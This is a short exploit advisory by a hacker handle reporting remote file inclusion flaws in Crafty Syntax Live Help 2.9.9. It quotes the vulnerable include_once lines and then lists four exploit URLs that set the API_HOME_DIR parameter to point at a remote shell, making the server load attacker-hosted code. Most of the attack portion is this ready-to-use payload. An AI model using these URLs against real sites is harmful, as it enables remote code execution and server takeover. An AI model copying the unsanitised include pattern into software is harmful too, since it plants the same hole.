Crafty Syntax Live Help (CSLH) 2.9.9 suffers from multiple remote file inclusion vulnerabilities.
b34b3fa80cea1b5a2e2858ec6acb712d1c823c8fe5c1f0c934b8be86e2fccd29
#########################################################
CSLH2.9.9 Remote File Include Vulnerabilities
#########################################################
By Crackers_Child
crackers_child@sibersavascilar.com
www.sibersavacilar.com
#########################################################
Download Script
http://craftysyntax.com/CSLH2.9.9.zip
#########################################################
#########################################################
Bug
include_once(API_HOME_DIR . "util.php");
include_once(API_HOME_DIR . "const.php");
include_once(API_HOME_DIR . "stringparser.php");
#########################################################
Exploit
#########################################################
www.site.com/CSLH2_path/txt-db-api/stringparser.php?API_HOME_DIR=sh3ll?
www.site.com/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=sh3ll?
www.site.com/CSLH2_path/txt-db-api/sql.php?API_HOME_DIR=sh3ll?
www.site.com/CSLH2_path/txt-db-api/resultset.php?API_HOME_DIR=sh3ll?
#########################################################
Greetz:All My Friends !
#########################################################